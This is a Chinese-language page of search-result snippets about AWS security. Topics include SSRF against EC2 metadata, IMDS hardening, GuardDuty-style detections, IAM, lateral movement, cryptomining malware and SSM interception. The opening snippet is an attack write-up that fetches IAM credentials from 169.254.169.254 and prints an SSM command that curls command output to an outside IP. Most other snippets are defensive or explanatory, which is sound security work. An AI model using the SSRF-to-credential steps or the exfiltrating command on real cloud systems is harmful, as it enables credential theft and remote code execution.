首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

使用SSRF泄漏云环境中的Metadata数据实现RCE

到目前为止只是[带外资源加载] 验证 SSRF 当我查看BurpSuite中的请求/响应时我注意到了响应头[X-Amz-Cf-Id] 所以,当前的环境应该是AWS。...正如我们所知,[169.254.169.254]是EC2实例的本地IP地址。 让我们尝试通过导航到[ latest/meta-data/]来访问元数据文件夹。 ? SSRF被确认。...让我们通过导航到[/latest/meta-data/iam/security-credentials/]来检查我们当前的角色。...parameters commands=’curl 128.199.xx.xx:8080/`whoami`’ –output text –region=region 但显示调用SendCommand操作发生错误...尝试读取[S3 Bucket]的内容: 尝试使用AWS CLI运行多个命令从AWS实例检索信息。但由于安全策略的原因,对大多数命令的访问被拒绝。

2.3K30

资源 | Parris:机器学习算法自动化训练工具

如果函数报错,那么需要从执行结果定位错误地址。一般而的报错很可能是因为 Lambda 函数的 IAM 角色中缺少 IAM 许可。 4....切换到 AWS 控制台的 EC2 实例视图,以查看你登录的新实例应该处于「Running」状态,并运行你的训练项目。...相反,EC2 实例将自行关闭。由于实例不再运行,因此我们能节省额外的成本。但若是要删除,我们需要导航回控制台的 CloudFormation 视图,并点击下拉 Action 中删除堆栈的选项。...终止 CloudFormation 栈 现在你已经创建了 CloudFormation 栈,并确认按照预期工作,那么我们可以安全终止该栈,以节省开销。 1....脚本首先尝试创建 Lambda 函数,如果创建失败出现函数中已经存在的错误,则脚本将运行函数代码的更新版。

2.9K90
您找到你想要的搜索结果了吗?
是的
没有找到

如何使用AWS EC2+Docker+JMeter构建分布式负载测试基础架构

你可以通过检查工具版本来测试,看看是否有任何错误,甚至可以尝试运行你计划在AWS中扩展的脚本(所有这些都应该在运行的容器中完成): Jmeter -v Java -version Jmeter -n...因此,我们不必访问每个实例,安装docker并一次一个实例启动容器。 能够通过“Run Command”功能在EC2实例上执行命令的唯一要求是,适当的IAM角色已与该实例相关联。...为现有实例设置IAM策略 ? 在实例创建关联IAM策略 当您创建角色,请确保将“AmazonEC2RoleforSSM”策略附加到您的角色上,这样就可以了。 ?...将权限关联到IAM角色 现在您可以使用“Run command”功能对多个实例批量执行脚本。 这将我们带入流程的下一步。...比如: 该文提到了一个EC2实例中有太多Websocket连接可能遇到的问题。

1.8K40

如何使用Metabadger帮助AWS EC2抵御SSRF攻击

在不需要的情况下禁用实例元数据服务,以减少攻击面; AWS实例元数据服务是什么?...用户也可以使用实例元数据访问用户启动实例指定的用户数据。例如,用户可指定参数以便配置实例,也可附加简单的脚本。用户也可以使用这些数据来构建更多可通过启动提供的配置文件来修改的通用AMI。...如果用户同时启动多个实例,则用户数据可供该预留中的所有实例使用。...工具要求 Metabadger需要带有下列权限的IAM角色或凭证: ec2:ModifyInstanceAttribute ec2:DescribeInstances 在对实例元数据服务进行更改时,我们应该谨慎...discover-role-usage 通过对实例及其使用的角色的总结,我们可以很好了解在更新元数据服务本身必须注意的事项: Options: -p, --profile TEXT Specify

86930

深入了解IAM和访问控制

如果你要想能够游刃有余地使用AWS的各种服务,在安全上的纰漏尽可能少,那么,首先需要先深入了解 IAM。...提供了用户(users)管理,群组(groups)管理,角色(roles)管理和权限(permissions)管理等供 AWS 的客户来管理自己账号下面的资源。 首先说用户(users)。...角色(roles)类似于用户,但没有任何访问凭证(密码或者密钥),一般被赋予某个资源(包括用户),使其临时具备某些权限。...比如说一个 EC2 instance 需要访问 DynamoDB,我们可以创建一个具有访问 DynamoDB 权限的角色,允许其被 EC2 service 代入(AssumeRule),然后创建 ec2...比如,当我希望对一个 S3 bucket 使能 web hosting ,这个 bucket 里面的 objects 自然是要允许外界访问的,所以需要如下的 inline policy: {

3.9K80

具有EC2自动训练的无服务器TensorFlow工作流程

请注意,在创建自定义策略,不会自动创建DynamoDB流策略,因此需要显式定义。 此外,将添加创建EC2实例所需的策略: EC2 —创建并运行实例。...IAM —获取,创建角色并将其添加到实例配置文件。从控制台启动EC2实例并选择IAM角色,会自动创建此配置文件,但是需要在功能内手动执行此操作。...接下来,检索实例配置文件,该配置文件定义了EC2实例将使用的IAM角色。每个需要阻止的调用都使用带有await关键字的promise表单。...有了实例配置文件,将为竞价型实例定义完整的EC2参数集。另一种选择是分别创建一个模板并直接启动。还将在关闭终止实例,这里的另一项优化是根据需要停止/启动持久实例。...HTTP事件输入应经过验证,并包括错误处理。 可以将暖机功能添加到面向客户端的端点,以限制冷启动较长的调用时间。 IAM资源权限应加强。

12.5K10

零停机给Kubernetes集群节点打系统补丁

当旧的 EC2 实例被终止,在这些 EC2 实例上运行的服务 Pod 也会被终止。如果 Pod 的终止过程没有得到妥善处理,可能会导致用户请求处理失败。...3优雅终止 EC2 实例 如上所述,我们的服务运行在 EC2 实例的节点组上。优雅终止 EC2 实例可以通过使用 AWS ASG 生命周期钩子和 AWS Lambda 服务来实现。...框架来部署 Lambda 函数(这个 Lambda 函数是内部开发的,我们把叫作 node-drainer),当发生特定的 ASG 生命周期钩子事件被触发。...下图显示了优雅终止节点组中的 EC2 实例所涉及的事件序列。 当 Patching Automation 请求终止实例,生命周期钩子将启动,并将实例置于 Terminating:Wait 状态。...4RBAC(基于角色的访问控制) 为了能从 AWS Lambda 函数访问 Kubernetes 资源,我们创建了一个 IAM 角色、一个clusterrole和一个clusterrolebinding

1.2K10

跟着大公司学数据安全架构之AWS和Google

尤其体现在资源的细颗粒程度,例如我要对EC2进行IP分配,这就是一个资源,而IAM针对这个资源的策略可以有允许、禁止、申请等不同的资源级权限,再进一步,要能够根据不同的角色甚至标签进行。...多说无益,直接看规则,就能知道他能干什么: • EC2与XorDDos恶意软件的IP地址进行通信 • EC2的25端口启动,可能对外发垃圾邮件或密信 • EC2查询C&C服务器关联的域名 • 与异常服务器端口上的远程主机进行通信...• 向远程主机生成异常大量的网络流量 • 查询与比特币相关活动相关的域名 • 一个API是从Kali Linux EC2实例调用的 • 调用账户中安全组,路由和ACL的网络访问权限的API • 调用通常用于更改账户中各种资源的安全访问策略的...IP地址调用API • API从已知的恶意IP地址被调用 • EC2实例正在执行出站端口扫描 • 调用通常用于发现与AWS账户中各种资源相关的权限的API • 调用通常用于启动计算资源(如EC2实例)的...• 从异常ISP的IP地址调用API • 参与了SSH暴力攻击 • 涉及RDP强力攻击 • IAM用户发生异常控制台登录 • 启动了一个不寻常类型的EC2实例 • 与比特币矿池进行通信 六、总结 关于两家的文档

1.8K10

AWS攻略——一文看懂AWS IAM设计和使用

4.5.1 创建角色 4.5.2 附加权限 4.5.3 附加角色 1 作用 一言以蔽之,AWS IAM就是为了管理:谁 (不)可以 对什么什么。...谁 对什么什么 前端代码审查角色 对代码仓库C、E、G和I 进行审查 后端代码审查角色 对代码仓库D、F、H和J 进行审查 3 总结 对照IAM,我们将上述内容拆开看。...4.5 角色 阿拉Software公司的代码审查工具是部署在EC2(虚拟机)上,我们就需要在IAM中新建一个角色——CodeCheckRole。让这些EC2属于这些角色,进而拥有一些权限。...4.5.1 创建角色 4.5.2 附加权限 因为只是举例,没有对权限做严格的限制——直接附加了最大权力的FullAccess策略。...4.5.3 附加角色 在创建EC2实例,我们在“IAM instance profile”中选择上述创建的角色

88610

云环境中的横向移动技术与场景剖析

威胁行为者首先尝试使用传统的横向移动技术访问EC2实例,例如利用默认的开放端口和滥用现有的SSH密钥等。 当这些方法都失败之后,威胁行为者随后便开始使用针对云端环境的横向移动技术。...通常负责在实例上提供交互式Shell,只是一种故障排除工具,并不具备任何网络功能。...与EC2实例连接技术相比,这种方法具有更大的限制,因为需要使用用户密码或其他功能(如SysRq)对实例的操作系统进行预配置。...此时,威胁行为者可以使用StartSession API建立到多个托管实例的连接,并使用如下图所示的命令在每个实例上启动交互式Shell会话: 需要注意的是,该方法不需要EC2实例中相关安全组的SSH入站规则...,从而可以有效绕过安全组规则。

12210

AMBERSQUID 云原生挖矿恶意软件疑似与印尼黑客有关

AMBERSQUID 攻击云服务但不会触发 AWS 申请更多资源的请求,与向 EC2 实例发送垃圾邮件类似。.../ulang.sh 角色与权限 容器执行的第一个脚本 amplify-role.sh 会创建 AWSCodeCommit-Role 角色,该角色是攻击者在攻击过程中使用到的多个角色之一。...提供了一个框架,用于将应用程序与多个其他 AWS 服务集成,例如用于身份验证的 AWS Cognito、用于 API 的 AWS AppSync 与用于存储的 AWS S3。...攻击者会创建多个 CloudFormation 堆栈,这些堆栈都是基于自定义 EC2 Image Builder 组件的模板。...Auto Scaling Amazon EC2 Auto Scaling 是一项功能,允许用户使用自己选择的扩展策略添加或删除 EC2 实例来弹性处理计算容量。

28230

每周云安全资讯-2022年第31周

实例中使用错误配置、公开允许的IAM策略和应用程序安全漏洞getshell https://mp.weixin.qq.com/s/rI72ir5B52FmNTDC526LxA 3 为什么云存储服务是网络钓鱼攻击的主要目标...攻击面管理解决方案可能成为大型企业的首要投资项目 https://mp.weixin.qq.com/s/et5gzhOt1uQjCw6RJ7hFoQ 7 无处不在的 AWS IAM 角色,无处不在的...此功能允许 AWS 账户之外的工作负载在您的 AWS 账户中担任角色并访问 AWS 资源。...软件从未像今天这样容易创建,从未像今天这样频繁更新,也从未创新过如此迅速适应客户需求 https://www.4hou.com/posts/6VXN 10 Top 7  Kubernetes 安全错误...然而,当威胁行为者将目光投向 K8s ,仅仅了解基础知识是不够的。

1.1K40

AWS机器学习初探(1):Comprehend - 自然语言处理服务

,用于连接和管理私有子网中的 Aurora 实例 有一个私有子网,其中创建了一个 Aurora 实例只能在 VPC 范围内被访问 VPC 中有一个 Lambda 函数。...因为该函数需要直接访问 Aurora 实例,因此必须在 VPC 之中。...2.2 实现 (1)按照部署图,创建所需的各个AWS 服务实例,包括EC2 实例、NAT 实例、VPC、安装phpmyadmin 等。过程省略。...首先在 IAM 界面上,创建一个 IAM Policy,包含 InvokeFunction 权限。 ? 再创建一个 IAM Role,包含该 policy。 ?...(7)做个简单测试,插入一条数据,如果出现下面的错误,则意味着 Aurora 成功调用了 Lambda 函数,但是 Lambda 函数无法连接到 Comprhend 服务。

2.1K40

蜂窝架构:一种云端高可用性架构

现在,每当我们想要添加新单元,只需要输入这个单元注册表代码,并向这个数组添加一个新条目。 现在,我们有了所有单元的数据,我们需要将其发布到某个地方,这样就可以从基础设施的其他部分访问。...反过来,如果你使用一个 AWS 帐户部署多个单元,就必须设置复杂的 IAM 策略来防止单元之间的交互。...这就是为什么你应该努力使让变得尽可能小而简单。 拥有这样一个路由层的一个好处是,它可以透明将用户从一个单元迁移到另一个单元。...每当开发人员需要更改部署基础设施的内容,都可以在这里完成。我们对部署步骤列表(例如,更改单元的顺序或使用更复杂的“烘焙”步骤)所做的任何更改都将自动反映在所有组件管道中。...有时候,如果没有真实的环境,根本无法测试和调试依赖多个服务或组件之间交互的复杂功能。 一些工程组织会尝试使用共享的开发环境来解决这个问题,但这需要开发人员之间的密切协作,并且容易发生冲突和停机。

13510

云安全:内部共享责任模型

但是,获得AWS身份和访问管理(IAM)角色临时凭据变得更容易。有了这些临时凭证,进行服务端请求伪造(SSRF)攻击相对容易。 Johnson声称有几种方法可以减少临时凭证的使用。...相反,这些服务通常在单独的Amazon EC2或其他基础设施实例上运行,但有时用户不用管理操作系统或平台层。...有了,用户负责管理客户操作系统(包括更新和安全补丁),在实例上安装的任何应用程序软件或实用程序,以及AWS每个实例提供的防火墙(也称为安全组)的配置。...例如,Kuberrnetes正在使混合云同时在多个云平台上运行。那么,如果用户正在运行一个跨越新的基于Red Hat的IBM云平台和AWS的程序,那么谁负责保护整个项目?当出现问题谁负责?...而且,最后但并非最不重要的是,当最终用户起诉谁来支付费用? 这是一个很好的问题。对于人们正在进入的这个新的复杂云世界,仍然没有很好的答案。 那么,用户可以做些什么?首先,确保了解自己的云安全需求。

1.1K20

SSM通信研究:如何拦截SSM代理流量

考虑到SSM处理身份验证的方式,如果我们可以访问EC2实例IAM凭证,则意味着我们可以拦截EC2消息以及SSM会话。这样一来,即使是低权限用户也可以拦截这些通信。...接下来,我们还会解释为了攻击者能够拦截和修改这些通信流量,并完全阻止资源的拥有者访问EC2实例。此外,这些内容还可以帮助大家更好了解SSM代理是如何在低级别上运行的。...拦截EC2消息 如果你曾经拦截过SSM代理的流量,你就会发现它会不断调用ec2messages:GetMessages。默认情况下,代理将持续执行此操作,保持连接打开大约20秒的时间。...因此,如果SSM代理先运行,我们就可以在上面创建一个新连接并实现消息的拦截了。...当用户尝试启动SSM会话(ssm:StartSession),控制信道将会接收请求并生成数据信道。而这条数据信道主要负责传输用户和EC2实例之间的实际通信消息。

54620

从Wiz Cluster Games 挑战赛漫谈K8s集群安全

镜像层结构是Docker镜像的核心概念之一,采用了分层的方式来构建和管理镜像。每个镜像都由多个只读的镜像层组成,每个层都包含了文件系统的一部分和相关的元数据。...节点的IAM角色名称的约定模式为:[集群名称]- 节点组-节点实例角色 解题思路 本关开始,我们的服务帐户的权限为空,无法列出pod、secret的名称以及详细信息: root@wiz-eks-challenge...刚好提示1中告诉我们“节点的IAM角色名称的约定模式为:[集群名称]- 节点组-节点实例角色”。...例如,假设你有一个服务账户A,只应该有访问某些特定资源的权限,而你的IAM角色有更广泛的权限。...其精髓在于采用 Kubernetes 的服务账户令牌卷投影特性,确保引用 IAM 角色的服务账户 Pod 在启动访问 AWS IAM 的公共 OIDC 发现端点。

29710

AWS 容器服务的安全实践

而对于EKS则需要同时了解和配置IAM和Kubernetes RBAC,就是基于角色的访问控制。IAM负责将权限分配到AWS服务,而RBAC负责控制资源的权限。...在RBAC中,一个角色,role,包含一组相关权限的规则。在RBAC中,权限是纯粹累加的,并不存在拒绝某操作的规则。...另外,通过 Amazon EKS 集群上服务账户 (service account)的 IAM 角色,您可以将 IAM 角色与 Kubernetes 服务账户关联。...当我们将ECS与VPC结合使用的时候,每个任务都会有自己专用的弹性网络接口 (ENI)。...一种既可以分配EC2实例IAM角色,又可以完全信任基于安全组的方式,是为不同的Pod使用不同的工作节点集群,甚至是完全独立的集群。

2.7K20
领券